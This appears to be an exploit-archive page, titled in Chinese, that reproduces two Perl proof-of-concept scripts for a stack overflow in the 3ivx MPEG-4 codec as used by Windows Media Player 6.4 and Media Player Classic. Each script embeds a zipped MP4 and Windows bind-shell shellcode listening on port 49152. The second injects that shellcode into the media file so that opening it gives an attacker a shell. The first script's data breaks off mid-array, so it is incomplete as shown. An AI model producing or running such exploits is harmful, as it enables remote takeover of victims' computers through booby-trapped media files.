3ivx MPEG-4基于堆栈的缓冲区溢出漏洞

#!/bin/perl # # Windows media player 6.4 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/coral/3ivx_d4_451_win.exe # # - open the MP4 file with mplayer2.exe # # SYS 49152 # gforce(put the @ here)operamail(put the . here)com # # update: # the latest 5.0.1 codec is still vulnerable use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); $zip_data = # code 724982 "\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\x56\xAC\x3F\x36\xC5". "\xE1\x2E\x98\x9A\x0A\x00\x00\x5C\xC2\x01\x00\x1E\x00\x00\x00". "\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". "\x6F\x72\x5F\x6D\x70\x6C\x61\x79\x65\x72\x32\x2E\x6D\x70\x34". "\xED\xD7\x0B\x70\x54\xD5\x19\x07\xF0\xB3\x9B\x8D\x80\x10\x26". "\x55\x21\x6A\x29\x46\x40\x4D\x7D\xA4\x9B\x4D\xC8\x83\xA1\x1A". "\x62\x72\x49\xD1\x00\x05\x12\x23\x89\x81\x65\x77\x21\xCB\x66". "\xB3\xC9\xEE\xE6\x85\x80\x81\x28\x06\x8C\x96\x47\x78\x09\xD4". "\xA0\xA0\xC4\x32\x3E\xA0\x15\x47\xA7\x45\xC6\x22\xA6\x2A\x56". "\xAD\xF5\xD1\x8A\x15\x15\xA5\x5A\x85\x98\x89\x05\x5F\xFD\x4E". "\xEE\x7F\xDD\x55\x47\x4B\x47\xC7\x8E\xFA\xFF\xE9\xC7\x39\xBB". "\xF7\xDE\xF3\xF8\xCE\xBD\xE7\x66\x95\x52\xC9\xB3\xC3\x4D\x35". "\x45\x19\xE3\x92\x95\xD0\xA5\xBF\x26\xC3\xE1\x0D\x05\xFC\xFA". "\xB3\xB2\x74\x25\xF9\x03\x81\x7A\xA9\x55\xF9\xEB\x2B\xDD\xFA". "\xAB\xDD\x25\x3F\x39\xB6\xA7\x72\xFA\x21\xA5\xAC\xA5\x4A\x9D". "\xB7\x58\x59\x94\xFE\x3F\xEA\x33\x1F\xBE\xF8\x39\x57\x7D\x25". "\xAB\x52\x09\x1D\xE1\xA0\xD3\x27\xF5\xF2\xB0\xAF\xAF\xCF\x7E". "\xBA\xCF\xDD\x25\xC3\x2D\xD1\xD6\xA4\xDF\xCF\x77\xF1\x3F\xF5". "\x9B\x30\xD6\xEF\xF6\x3A\xA5\x92\xEC\x77\x47\xE7\x65\xF6\xB1". "\x3D\x5F\x0D\x2C\x55\xC5\x7F\xEC\x3B\xF1\xEC\x4A\x77\x55\x30". "\x72\x55\x28\x50\x57\xFD\xB9\x5E\x06\xBD\xE7\xF7\x56\xCF\x96". "\x4A\x62\xC8\x6F\x36\x04\xA3\xDC\xE6\xF7\xC3\xDC\x41\xCF\xEC". "\x98\x21\x0D\xAA\x0B\x56\x25\x9B\xF5\x41\xBB\x42\xE1\x59\x55". "\x52\x9F\x13\x0A\x87\xDC\x31\xE7\x5C\x21\x8B\xE0\xFC\xC2\x34". "\xAC\x2A\x51\x17\x32\x3C\x2D\xDD\x13\x72\x87\x74\x25\xAE\xB9". "\xB9\x79\x84\x94\x36\x29\x4F\xCB\x1D\xA2\xAC\x43\x95\x75\xEC". "\x36\x65\xE9\x7E\x2C\x5E\xBE\xB1\x9E\x92\x78\x92\x14\x16\xC9". "\xAB\x3A\x3D\x14\x0E\x87\xA2\xCD\x5A\xFF\x2A\x17\xE9\x7A\x8A". "\x74\xEF\xFA\xB4\x13\xB3\xCB\x21\x28\x47\xEA\x21\x9B\xF5\x81". "\x55\x72\xDE\xBC\xE8\x0C\xF5\xF5\xAA\xDF\xB7\x14\x4F\xC8\x10". "\x3E\x94\x78\x4F\x42\xD7\x77\x4A\xFC\x45\x62\xBB\x44\xB3\x84". "\xAC\x91\x65\x09\x8E\x6D\x91\xB8\x43\xE2\x5E\x89\x0D\x38\x77". "\x9D\x84\xDC\xB3\x16\x19\xBF\xE5\x16\x89\x36\x89\x3B\x25\x24". "\xCD\x96\xF9\x12\x4F\xE2\xF3\xAF\x24\x36\x22\x9E\x95\x78\x59". "\x62\x81\xC4\xEF\x25\xCA\x25\x66\x49\xEC\x42\x9F\xB2\xAC\x96". "\x22\x89\xB5\x12\xF2\x8C\x58\xF6\xA1\x7E\x2D\xEA\xCB\x25\xEE". "\x96\x58\x23\x21\xF9\xB5\xDC\x24\x51\x23\x51\x68\xF6\x6F\x3D". "\x59\xCA\x26\x89\xA9\x12\x25\x68\x2B\x5D\x62\xA9\x84\x17\xE7". "\xD6\x49\x84\x25\x0C\x89\x3D\x38\xFF\x25\x89\xD7\xF0\xFD\xE5". "\x12\x73\x10\x41\x94\xF3\x62\x4A\x37\xDA\xD1\xE3\xBE\x46\xC2". "\x83\xF3\xF4\xFC\x57\x20\x16\x49\xDC\x2C\xB1\x43\xE2\x3A\xC4". "\x0A\x8C\xBB\x1D\xB9\x5C\x87\xFA\x6F\x70\xAE\xCE\xC7\xAB\x12". "\xC7\x31\xC7\x95\x98\x9F\x1F\x79\x89\xE4\x4A\x8F\x73\x31\xAE". "\xFD\x2D\xCA\xDF\x49\xBC\x2D\x71\x40\x62\x35\xC6\x37\x37\x66". "\x2D\x1F\x91\x78\x00\xF9\x0F\x62\x8D\x1E\x96\x98\x89\xF6\xAB". "\x91\xEF\x0D\xC8\x53\x03\xD6\x5E\xB7\x7D\xB5\xC4\x2A\xE4\xE9". "\xEF\x12\xFF\xC4\x5A\x2E\xC5\x38\xF4\xFA\x36\x4A\x74\x4A\x5C". "\x8F\xF3\x57\x60\x0E\x95\x18\x87\x07\xD7\xD7\x21\x87\xDE\xCF". "\xCD\x4B\xF6\x26\x4B\xAB\x44\x87\xC4\x36\x94\xFA\xBA\x85\x38". "\xBF\x1A\x9F\x67\x63\x6C\xB5\x68\xB3\x4B\xE2\x6F\x18\xC7\x22". "\xF4\x1F\x42\xBE\x97\x21\x5F\x3E\xAC\x59\x10\xED\x34\x63\xDD". "\xE6\xE0\xBA\x6B\x31\x57\x7D\x6F\x3F\xAD\xCC\x7B\x79\x31\x72". "\x7F\x0D\x42\x5F\x13\xC6\xBC\x17\xA0\xFD\xF9\x68\x57\x1F\xDF". "\xAF\xCC\x67\xE1\x6D\xCC\x2B\x88\xF3\x3D\x18\x73\x08\x7D\xEB". "\x3E\xCB\xF0\xBD\x5C\x2B\x1B\x8B\xB9\x5E\x0B\x31\xBF\xCA\x98". "\x73\xCB\x70\x7E\x1D\x72\x3A\x2F\x66\xAC\xF3\x51\x5F\x8A\xCF". "\x7A\x9D\xEF\x97\xB8\x15\x63\x5C\x8D\xB9\xE8\xF1\x5C\x85\x6B". "\xFF\x85\x75\x9C\x87\xF5\xD2\xF7\x4A\x40\x99\xCF\x91\x07\x39". "\xBD\x3A\x66\x7E\x3A\x97\x1B\xD0\x57\x18\x39\xD0\xF7\xD0\xAB". "\x38\xB7\x16\x6B\xF1\x9C\x32\xEF\xE7\x76\xE4\x4C\xDF\x23\x2B". "\x91\xFB\x46\xCC\xC9\x17\x73\x4D\x13\xFA\xF3\xE1\x7C\x7D\xAE". "\x7E\x4E\x6E\x97\xB8\x51\x99\xF7\xCE\x53\x98\x8F\x1E\x83\xDE". "\x43\x1E\x54\xE6\x33\xA2\xEF\xB1\x16\x89\x83\x98\x6B\x15\x72". "\x1D\xC0\xBC\xD6\x61\x3D\x36\x21\x07\x0D\x18\xFB\x5E\xB4\xF3". "\x3C\xD6\x76\x21\xE6\xA8\xD7\xBA\x15\xE3\x8A\x3C\xCF\x8F\x23". "\xFF\x0D\xC8\xFF\x2C\x94\x7E\xCC\xC7\x8D\xB1\xD7\x60\x6E\x01". "\x44\x4D\xCC\x5A\x5F\x89\xF5\x69\xC0\x18\x9B\x50\xDF\x86\xF1". "\x2F\xC7\xBC\x75\x3B\xF7\x49\x4C\xC6\xDC\xDD\xC8\xE3\x38\x8C". "\x77\x22\xD6\xF8\x12\xE4\xEA\x5E\x7C\x97\xA3\xCC\x67\x44\xEF". "\xC3\x3F\x97\xB8\x58\xE2\x1E\x89\x6C\xB4\xAF\xE7\x5F\x8C\x75". "\xD1\x73\x2A\x45\x2E\x2B\x70\xBE\x5E\x7B\x2F\xE6\x96\xA9\xCC". "\x7B\x26\x13\xF9\xE8\xC1\x3A\x1B\xC8\x43\xAE\xC4\x74\x89\x11". "\x18\x9B\xCE\x67\x0A\xFA\x5F\x8E\x7C\xEA\x3D\x56\xDF\x1F\x6B". "\x90\xCB\xB9\xB8\xB6\x16\x39\xD3\xB9\x99\x81\xEF\x9B\x90\x73". "\xBD\x6E\xFA\xDE\x6A\x43\x79\x0E\xD6\x58\xD7\xFF\x8C\x5C\xBC". "\xA3\xCC\x7D\xBF\x16\xF9\x7C\x04\x79\xD8\xAA\xCC\x3D\xCC\x8D". "\xBC\x36\xC5\xAC\xEB\x2B\xC8\xB9\xBE\xC7\x66\xAA\xE8\x9E\x51". "\x83\x35\xD4\xFB\x55\x81\x32\xF7\x3B\x3F\xAE\xD3\xC7\x17\xE1". "\xBB\x1B\xD1\x97\x8E\x51\xF2\x9E\xFC\x40\xCA\x91\xC8\x81\xCE". "\x91\x43\x22\x49\xA2\x3F\xC6\xE0\xC1\x75\x37\x63\x9C\x8F\xCA". "\x73\x6D\x41\xFE\xF4\x7D\xA3\xF7\x21\x7D\x4F\x2D\xC1\x5A\x36". "\x23\x27\x3A\x77\x01\xF4\xB7\x18\x9F\x17\x22\xAF\xFA\x39\xBC". "\x12\x6D\x57\xA2\x5C\xA4\xA2\x7B\x4A\x64\x4F\xBA\x1E\x75\x2F". "\xC6\x57\xA9\xA2\xF7\x9A\xCE\xF5\x24\xE4\x7D\x26\xD6\x7A\x06". "\x8E\x4F\xC4\xE7\xC8\x3E\x5A\x87\x5C\xFA\xD1\x46\x0B\xDA\xD4". "\x6B\xA8\xDF\x47\x67\x49\xE4\xA1\x3D\xFD\x4E\x8D\xC3\x1C\xF4". "\xFD\xFC\x2E\xF2\xA3\xF3\xAC\xF7\x8E\x72\xB4\xA7\xEF\x6D\xBD". "\xF7\xBC\xA8\xCC\xF7\x53\x21\xDA\x98\x80\xF9\x85\xB0\xD6\xB3". "\x55\x74\xEF\xB9\x09\xDF\xB7\xAA\xE8\xFE\x3D\x17\xB9\xB9\x01". "\xE3\xAA\xC3\xB1\x05\x98\x4F\x33\xF2\x77\x0D\xAE\xF3\xA1\xAD". "\xC5\x2A\xFA\xEC\xEA\x3D\xEE\x3A\x15\xDD\x67\x1B\xB1\x1E\xEB". "\x71\x5D\x0B\xBE\xD3\x7B\xCF\x26\xAC\x7D\xE4\xEF\x9A\x6A\x8C". "\xAB\x59\x45\xEF\x5D\x7D\x2F\x05\x91\x23\x1D\x57\x60\x3C\x7E". "\xC4\xD5\x2A\xBA\x2F\x35\x62\x8E\x01\xF4\x35\x13\xEB\x73\x05". "\xD6\xD8\xA7\xA2\xEF\x09\xBF\x8A\xEE\xC9\x57\x61\x0E\x01\xCC". "\xC1\x83\xE3\xB1\xF7\x42\x23\xFA\x5F\x1C\x33\xF7\xF9\x18\x4B". "\x10\xE3\x95\xE7\x4B\x1D\xC7\x98\xCA\x90\xBF\x46\xF5\xE9\x5E". "\xA6\x7A\x91\x4F\x7D\xFF\xEA\xFB\x59\xEF\x9B\xFA\x5E\x5A\x83". "\x6B\x22\xCF\xAF\x0F\x63\x89\x3C\xDF\x2D\xC8\xEF\x92\x98\x39". "\xD6\x23\x77\x91\xB5\x5D\x8A\x71\x84\xD0\x47\xE4\x3D\x1D\xD9". "\xA3\x6E\xC6\xF5\x7A\x6D\x6E\xC7\xB8\x17\x20\xD7\xBA\x9D\xC8". "\xFB\x3C\xF2\x37\x65\xEC\xFB\xB1\x09\xFD\x96\xA3\xAE\x73\x54". "\x85\xF6\x9B\x90\xAB\x06\xAC\xB9\x7C\x56\x1B\x43\x61\x57\x00". "\x7F\x68\x8F\x94\x3F\x1D\x2E\x91\x78\x5A\xFE\x9C\xCA\x55\xD6". "\x93\x12\x94\xF5\x9C\x63\xCA\x9A\x7F\x40\x59\x3D\x15\xCA\x7A". --------------------------------------------------------- #!/bin/perl # # Media Player Classic 6.4.9 MP4 Stack Overflow # # 0-day discovered and exploited by SYS 49152 # # Tested on win XP SP2 ENG # Shell on port 49152 # # usage: # - download this codec in order to manage MP4 content: # http://www.3ivx.com/coral/3ivx_d4_451_win.exe # # - open the MP4 file with mplayerc.exe # # SYS 49152 # gforce(put the @ here)operamail(put the . here)com # # update: # the latest 5.0.1 codec is still vulnerable use Archive::Zip qw( :ERROR_CODES :CONSTANTS ); $zip_data = # code 724981 "\x50\x4B\x03\x04\x14\x00\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3". "\x13\xD9\x53\x73\x02\x00\x00\x57\x04\x00\x00\x19\x00\x00\x00". "\x53\x59\x53\x5F\x34\x39\x31\x35\x32\x5F\x4D\x50\x34\x5F\x66". "\x6F\x72\x5F\x4D\x50\x43\x2E\x6D\x70\x34\x63\x60\x60\xBF\x9C". "\x9B\x9F\x5F\xC6\xC0\xC0\x90\x93\x5B\x96\x91\x02\xA4\x19\x0E". "\xBC\xF1\x2B\x3B\xF0\x26\x2C\x99\x81\x81\xF9\x05\x88\xCF\xC0". "\x08\x46\x08\x80\xC2\xC1\xE4\x3B\x30\xE0\x05\x40\xD5\xEC\xF1". "\xA5\x29\x25\x89\x40\x3A\x3C\x37\x15\x44\x83\x81\x62\x46\x4A". "\x4E\x11\x4C\x51\x6E\x4A\x66\x51\x62\x41\x41\x0E\x92\x3E\x76". "\xAD\xCC\x9C\xE2\x12\x20\x43\x62\x65\x5E\x62\x2E\x90\x16\x48". "\x49\x04\x6B\x86\x59\x2F\xB1\xB2\xBC\xA8\x04\xAB\xB8\x63\x50". "\x08\x56\xF1\xC4\x9C\x24\x4C\x71\x36\xF3\x95\xC9\xB9\x40\x73". "\x98\x6F\x21\x8B\x4F\x40\x02\xAC\x4C\x8C\xBE\xBA\x8C\x8C\xBE". "\x0E\xBE\x0D\x37\x80\x04\x90\x62\x85\x50\x8C\x10\xCA\x01\x42". "\x75\x41\xA8\x06\x08\x55\x0A\xA1\x58\x20\x14\x37\x84\xFA\xE4". "\xFB\x9A\x0C\xD0\x9D\x16\xEE\xE0\xCC\xF1\xB3\xA4\xE3\xF5\x84". "\x41\x03\x5E\xBF\x16\xCD\x99\xE0\x3A\xD1\x97\x95\x05\x12\x36". "\x01\xBE\x87\x83\x23\x83\x4D\x2C\x0D\x4D\x8D\x14\x82\x42\x7D". "\x5C\xA3\x14\x8D\x4F\x36\xBF\xDC\x70\xF3\xDD\xCD\x12\x95\x2F". "\xD1\x8D\xC5\xC2\x2B\x5C\xBF\xEE\x68\x7E\xFD\xE7\xD1\x97\x10". "\x7D\xB9\xAF\x0E\x7B\xB8\xDC\xC3\x55\xEB\xAE\xF4\x24\xD6\xFD". "\x9D\x72\xAE\x73\xEF\x05\x17\x29\xE3\xE7\xB1\x75\xCF\x3B\x5C". "\xE4\x3E\x2A\x17\xD6\xED\x74\x2B\x31\x55\x64\x39\x68\x7A\x66". "\x7D\x8B\xFD\xD6\x95\xED\x72\x3E\x93\x05\x2F\x4E\xB8\xBB\xA0". "\xEE\x79\x8F\x8B\xDC\x3D\x65\xCF\x7D\xC6\xDF\x23\xBF\x04\xAF". "\xCE\xAC\x33\x3C\x92\xF8\xF2\x66\x76\x89\xDE\x1D\x65\xB6\xA3". "\xC6\x2F\x3C\xEB\x4E\x6C\x79\x51\xF7\x63\x81\xF4\x5C\xB3\x67". "\xDE\x92\x2F\xC2\x27\x4F\x7E\x7D\x4E\xF7\x58\xD7\x01\xA3\xB6". "\xAE\xEF\x82\x5C\x19\x07\xFA\x24\x5C\x26\x8B\x72\xE5\x7D\x3F". "\x23\x70\x4F\x73\xC5\xDF\x5D\x7F\xF5\xBF\xBB\x57\xE8\xEA\x6C". "\x8C\x7D\xB1\xC8\xBD\x4E\x6C\xD9\xEB\xDF\x62\xDB\x5E\xBF\x16". "\xE3\xCA\x38\xA7\x6B\xBA\xE3\x9C\x58\x4D\xA4\xAD\x6E\xE0\xA2". "\x1B\x4D\x40\x39\xFD\xA7\x2F\xFF\xEE\x52\xBD\xC0\xF3\xE2\x76". "\xE0\xFF\x5D\xCA\xAF\x41\x6C\x5F\x9E\xE2\x8F\x40\xF6\x8B\x3F". "\x82\x0B\xDC\x2B\xAE\xCD\x8D\xBF\xD8\xDC\xF3\x3E\x7C\x32\x90". "\xAD\x3C\xFF\xCE\x39\xDD\x69\x57\x15\x17\xCC\x7F\xF1\x31\xC7". "\xD2\xD0\x5F\x7F\xA3\xA1\x57\x89\xA9\x37\xD3\xEE\xED\x53\xC3". "\xD8\x6F\x6A\xAB\xDA\x9F\x15\x66\x7E\x37\xF7\x54\xD8\xB7\xC7". "\xEE\x77\x19\xB9\xF2\x3E\x0B\x2D\x7F\xF9\x53\x64\xFE\xCE\x9F". "\x22\x0B\x5E\x86\x4F\x9D\x2B\x5A\xE8\x60\xFD\x3A\x7C\xF2\x7C". "\xF7\xF0\x22\xAE\x0C\x65\x21\x4E\xEB\x1C\x45\xAE\xBC\x5F\x40". "\xFB\xDC\xBB\x45\x6F\xFC\xDE\xA5\xEC\x5E\x01\x0C\xC4\x52\x70". "\x52\x4E\x4F\xCD\xC3\x92\xC4\x15\x4A\x8A\xB2\x41\xE2\x12\x50". "\x71\x74\xA0\x90\x92\x59\x9C\x8D\x47\x5E\xAA\x24\xB7\x20\x1F". "\x48\x0B\x41\xE5\x45\xE1\x32\x92\xC9\x05\x99\xA0\xDC\x29\x88". "\x2E\xC3\x91\x0B\x14\x01\x00\x50\x4B\x01\x02\x14\x00\x14\x00". "\x00\x00\x08\x00\xB3\xB1\x30\x36\xF3\x13\xD9\x53\x73\x02\x00". "\x00\x57\x04\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00\x00\x00". "\x20\x00\x00\x00\x00\x00\x00\x00\x53\x59\x53\x5F\x34\x39\x31". "\x35\x32\x5F\x4D\x50\x34\x5F\x66\x6F\x72\x5F\x4D\x50\x43\x2E". "\x6D\x70\x34\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00". "\x47\x00\x00\x00\xAA\x02\x00\x00\x00\x00"; my $shellcode = # code 724981 "\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13". "\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC". "\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0". "\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9". "\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E". "\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49". "\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B". "\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8". "\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6". "\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15". "\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78". "\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB". "\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51". "\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8". "\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF". "\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF". "\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F". "\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB". "\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56". "\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9". "\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F". "\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA". "\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8"; open(code, ">tempzip.zip") || die "Can't Write temporary File\n"; binmode (code); print code $zip_data; close (code); print "\nTemporary file ready, patching..\n"; my $zip = Archive::Zip->new(); $zip->read( 'tempzip.zip' ) ; $zip->extractMember( 'SYS_49152_MP4_for_MPC.mp4' ); open(code, "+<SYS_49152_MP4_for_MPC.mp4") || die "Can't Open temporary File\n"; binmode (code); seek code,619,0; print code $shellcode; close (code); print "Shellcode added, have fun!\n";